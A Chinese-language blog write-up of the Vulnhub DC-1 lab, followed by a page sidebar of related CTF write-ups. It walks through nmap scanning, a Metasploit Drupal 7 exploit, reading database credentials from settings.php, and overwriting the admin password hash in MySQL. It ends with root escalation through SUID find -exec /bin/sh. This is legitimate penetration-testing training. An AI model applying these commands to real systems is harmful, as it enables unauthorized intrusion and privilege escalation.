DC-1 Write up

最新推荐文章于 2024-09-16 09:36:19 发布
最新推荐文章于 2024-09-16 09:36:19 发布
阅读量1.4k 收藏 35
点赞数 25
分类专栏: 渗透测试演练 文章标签: 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/L_erAry/article/details/141108836
版权

nmap主机发现

Nmap 端口扫描,发现22 80 111端口开放,Apache/2.2.22 (Debian) cms为Drupal 7 OS为Linux

访问网址,查看源代码无重要信息

Dirb目录扫描发现一些目录但是无权访问,而且目录项很多,尝试bp爆破无果,尝试用msf从CMS入手

msfconsole

search Drupal 7

选择第二个

1 use 2

2 show missing 查看必须设置的选项

3 set rhosts 

4 set lhost(第一次msf需要设置)

5 set lport(第一次msf需要设置)

6 show options 查看参数配置情况

确定设置的信息没问题

输入run开始执行攻击,成功

ls可以看到第一个flag1.txt

输入命令:python -c "import pty;pty.spawn('/bin/bash')" 用python建立交互shell伪终端

直接访问/root提示无权限

考虑 sudo -l、 history 、linux内核漏洞提权、敏感文件

服务器信息:Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux

第一个flag提示:有一个config file,所以考虑flag在durpal配置文件中,百度后直接cat settings.php或者通过grep关键字查找  grep -Rn "flag2" *

grep -Rn "flag2" *

flag2提示要通过认证,但是暴力破解不是唯一的方法。配置文件flag2的下面就是数据库配置,考虑通过进入数据库查看账号密码。

username=dbuser, password=R0ck3t 尝试连接mysql数据库

查看一下数据表

show databases;

· 1.

使用数据表

use drupaldb;

· 1.

查看表的数据

show tables;

· 1.

注意到表里的users

使用命令查看一下

select * from users \G;

pass=$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR,对hash值进行破解然后想办法替换,考虑可能提供了相关工具或脚本,尝试搜索 find / -name “*hash”

php scripts/password-hash.sh admin,注意scripts/password-hash.sh为相对路径 admin为想设置的明文密码

$S$D08ofgINFSRux8tsNQ/9V5gU9esFd2MQnDnVH9DLNvD7hx5B9/Jd为加密后的admin,现在要将这个结果写入mysql的数据库中

update users set pass="$S$D08ofgINFSRux8tsNQ/9V5gU9esFd2MQnDnVH9DLNvD7hx5B9/Jd" where name="admin";

更新后登录web页面成功,考虑文件上传漏洞还有wfuzz 以及直接用这个用户ssh登录尝试(发现/etc/passwd中无admin用户,该方法此处不考虑)

逐个点击查看,发现flag3

*通过find提权*

特殊的PERM将帮助查找密码-但您需要-exec执行该命令才能找出如何获取阴影中的内容。

Find / -perm -400 2>/dev/null (从根目录开始递归地搜索所有只对文件所有者具有读权限,并且对其他用户没有任何权限的文件。)

find ./ aaa -exec "/bin/sh" \; 在当前目录(. 表示当前目录)及其子目录下查找名为 "aaa" 的文件或目录,并对每个找到的匹配项执行 /bin/sh 命令。 注意我测试时在这里换成"/bin/bash"好像没生效

每个靶场可能有多种思路,其他的解题思路也可以参考下面这篇文章

https://blog.51cto.com/u_16219015/7010925

L_erAry
关注
专栏目录
OSCP-Challenge 1 - Medtech
羽的博客
03-14 3631
122靶机进入/home/mario/.ssh目录下,发现存在id_rsa,用这个逐个登录内网靶机,发现14的成功进入。现在我们通过代理可以扫描内网的其他机器了,扫了下10-14、83、83开放的端口基本差不多,发现都有5985。如果可以看到的话,那就简单了,直接覆盖成shell文件就可以了,然后等待反弹。登录后发现限制了命令的执行,但是help了一下,发现了哪些可以用的命令。咨询了一下是dns的问题,修改dns的ip位域的ip,也就是10的ip。接着上mimikatz来获取一些明文信息,但是失败了。
MOCTF-WRITE-UP(一)
郁离歌丶的博客
01-31 3641
萌新第一次写wp,今天发现了moctf这个平台,顺手点进去做了几个简单的萌新题目。已是深夜,先写一点点。写的不好请见谅。WEB签到question:欢迎加入MOCTF官方交流群:620047348answer:加群得flag。一道水题question:呱呱呱?answer:二话不说f12审查元素发现flag还是水题question:膜CTF?answer:二话不说f12审查元素again可以发现两...
Vulnhub-DC-1靶机渗透练习
weixin_52451257的博客
11-15 4228
DC-1 第一步:信息收集 nmap -sn 192.168.231.0/24 (进行存活主机发现) nmap -A -p- 192.168.231.142 (进行针对靶机的详细信息收集查看靶机开放了那些端口) dirb -http://192.168.231.142 nikto -h http://192.168.231.142 (敏感信息发现,cms是drupal7.0版本) 第二部:漏洞利用 msf 搜索关于drupal的相关漏洞. 我可能是歪打正着,上...
Vulnhub-DC-3靶场渗透练习
weixin_52451257的博客
11-17 2955
Vulnhub-DC-3 1105 DC-3 靶场地址: https://www.vulnhub.com/entry/dc-32,312/ 第一步:信息收集 nmap -sn 192.168.231.0/24 nmap -A -p- 192.168.231.141 dirb http://192.168.231.141 nikto -h http://192.168.231.141 去了日常四件套进行信息收集还可以通过joomscan工具对网站进行扫描 joomsc...
vulnhub靶机-DC9-Writeup
liuhanzhe的专栏
12-09 2341
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-9,412/ DESCRIPTION DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The ultimate goal of this challenge is to get root and to read the
vulnhub靶机-DC8-Writeup
liuhanzhe的专栏
12-09 1996
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-8,367/ DESCRIPTION DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challenge is a bit of a hybrid between being an actual challe
白帽杯2022-Misc 游戏秘籍 write-up
zgzhzywzd的博客
01-02 4280
游戏秘籍 题目名称:游戏秘籍 题目说明:做为程序员我的,竟然无法调出30条命,我用笔记记录下来了。 0x01 LSB隐写 下载后是一张魂斗罗的图片30.png,先用zsteg 30.png查看一下,发现有PK开头的字符,可能是压缩包,用zsteg -E "extradata:0" 30.png > 30.zip提取压缩包。 0x02 压缩包重组 用010editor打开,发现一段提示:Need_Find_The_Passwd_to_unzip_file0,保...
crypto write up
weixin_30390075的博客
09-19 1123
problem:回旋十三踢 from:2015广州强网杯 description: 看我回旋13踢synt{5pq1004q-86n5-46q8-o720-oro5on0417r1} write up: rot13 flag{5cd1004d-86a5-46d8-b720-beb5ba0417e1} problem:Rotated! from:iceCTF d...
write up】2021春秋杯-BabySteg
zero;
03-26 4619
题目介绍 题目名称 Baby_steg 类型 Misc 题目分析 题目提供了一个7z的加密压缩包password.7z 、一个txt文件flag1.txt。 flag1.txt内容: password.7z内容: 通过flag1.txt内容中flag.7z 盲猜是个7z压缩文件。 解题过程 修改后缀 将flag1.txt后缀改为7z,打开之后发现…(盲猜正确) 那么这题至此就可以放弃了。 尝试把它丢进windows虚拟机,使用WinRAR成功打开。(这锅Mac
2022美亚杯第八届中国电子数据取证大赛-个人赛write up详解
热门推荐
weixin_42744595的博客
11-21 1万+
2022“美亚杯”第八届中国电子数据取证大赛-个人赛 本人TEL15543132658同wechat,本内容为我个人解题思路,有不同见解欢迎讨论。 检材文件下载链接:https://pan.baidu.com/s/1kg8FMeMaj6BIBmuvUZHA3Q?pwd=ngzs
vulnhub靶机 | DC-1 write-up
xj28555的博客
05-14 320
搭建好环境,我们用nmap来扫描靶机的ip地址 nmap -sP 192.168.110.1/24 扫描到靶机的ip地址为192.168.110.174,那接下来我们来进行扫描一下端口 nmap -sV 192.168.110.174 发现开放一些22 ssh端口 80 web端口,那我们先访问一下web端口。 简单尝试了一下弱口令 admin admin 等账号密码,发现没有用,那我们就对其进行信息收集一下。 可以看到以上信息,可以看到一个cms是一个Drupal7的.
Buuctf-Reverse(逆向) 2019RedHat(红帽杯)-xx Write up
weixin_50166464的博客
10-20 466
0x00 日常查壳 无壳64位 0x01 分析主函数 考的主要还是正向开发 int __cdecl main(int argc, const char **argv, const char **envp) { unsigned __int64 flaglen2; // rbx __int64 flaglen1; // rax __int128 *malloc5; // rax __int64 data; // r11 __int128 *malloc7; // r14.
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1331
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
4.网络编程
weixin_45476535的博客
09-14 488
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
Java-网络
2301_81543552的博客
09-14 693
Java中的网络编程主要涉及使用Socket类进行网络通信,以及理解各种网络协议。以下是一些关键概念和示例代码,帮助您入门。
使用堡垒机登录ftp服务报网络不可达错误
ajax_beijing_java的博客
09-14 202
解决方法:由于不想安装额外的服务在服务器上,于是想到使用sftp服务代替ftp服务,发现是可以使用的。22端口默认就是启动的,在堡垒机上加了sftp服务,再次连接服务器并使用filezila传输文件 ,文件可以正常传输。至此,问题得到解决。场景:开发同事想使用ftp传输服务,连接服务器时报网络不可达错误。排查发现,如果想使用ftp服务,需要在服务器上部署ftp服务,21端口才会存在,才可以访问该服务。
WireShark分析localhost包
ngczx的博客
09-11 708
WireShark分析localhost包
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-11 954
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
【计算机网络 - 基础问题】每日 3 题(七)
最新发布
Newin2020的博客
09-16 896
✍个人博客:Pandaconda-CSDN博客📣专栏地址:http://t.csdnimg.cn/fYaBd📚专栏简介:在这个专栏中,我将会分享 C++ 面试中常见的面试题给大家~📝推荐参考地址:https://www.xiaolincoding.com/(这个大佬的专栏非常有用!
DC综合工具使用指南:启动文件配置和命令使用方法
1_fifo_ram_worst.db frame_len_ram_worst.db MAC_DOWN_ram_worst.db MAC_UP_DATA_RAM_worst.db ram_worst.db romram_worst.db rom_worst.db。 其次,需要设置符号库。符号库是指存储着某些符号信息的数据库。在 DC...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值